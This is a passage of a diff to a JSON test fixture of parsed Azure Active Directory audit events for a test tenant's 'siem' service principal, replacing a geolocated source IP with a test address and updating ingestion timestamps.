"Value\":\"R5\"}],\"Id\":\"7bca6665-4d58-4df9-bd34-4d92e1fc63aa\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add a deletion-marked app role assignment grant to service principal as part of link removal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.125060300Z", + "original": 
"{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:17:00\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"b2484c3c-5461-43ab-850b-70fccf706796\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:17:00.2133065Z\"},{\"Name\":\"env_epoch\",\"Value\":\"OLE3R\"},{\"Name\":\"env_seqNum\",\"Value\":\"55908041\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##53a69eec-6bcd-473f-9c68-150d680e0776_00000000-0000-0000-0000-000000000000_53a69eec-6bcd-473f-9c68-150d680e0776\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR551\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\
"Value\":\"R5\"}],\"Id\":\"7bca6665-4d58-4df9-bd34-4d92e1fc63aa\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add a deletion-marked app role assignment grant to service principal as part of link removal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", 
@@ -8390,25 +7670,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -8422,7 +7684,7 @@ "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -8558,7 +7820,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { 
@@ -8570,12 +7832,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036346900Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:17:00\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"b2484c3c-5461-43ab-850b-70fccf706796\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:17:00.2133065Z\"},{\"Name\":\"env_epoch\",\"Value\":\"OLE3R\"},{\"Name\":\"env_seqNum\",\"Value\":\"55908032\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##53a69eec-6bcd-473f-9c68-150d680e0776_00000000-0000-0000-0000-000000000000_53a69eec-6bcd-473f-9c68-150d680e0776\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR551\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\
"Value\":\"R5\"}],\"Id\":\"31d7436e-85aa-4aee-a945-6a0ff51ea975\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Remove app role assignment from service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.125066900Z", + "original": 
"{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:17:00\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"b2484c3c-5461-43ab-850b-70fccf706796\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:17:00.2133065Z\"},{\"Name\":\"env_epoch\",\"Value\":\"OLE3R\"},{\"Name\":\"env_seqNum\",\"Value\":\"55908032\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##53a69eec-6bcd-473f-9c68-150d680e0776_00000000-0000-0000-0000-000000000000_53a69eec-6bcd-473f-9c68-150d680e0776\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR551\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\
"Value\":\"R5\"}],\"Id\":\"31d7436e-85aa-4aee-a945-6a0ff51ea975\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Remove app role assignment from service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", 
@@ -8601,25 +7863,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -8633,7 +7877,7 @@ "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -8769,7 +8013,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { 
@@ -8781,12 +8025,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036351800Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:17:00\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"b2484c3c-5461-43ab-850b-70fccf706796\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 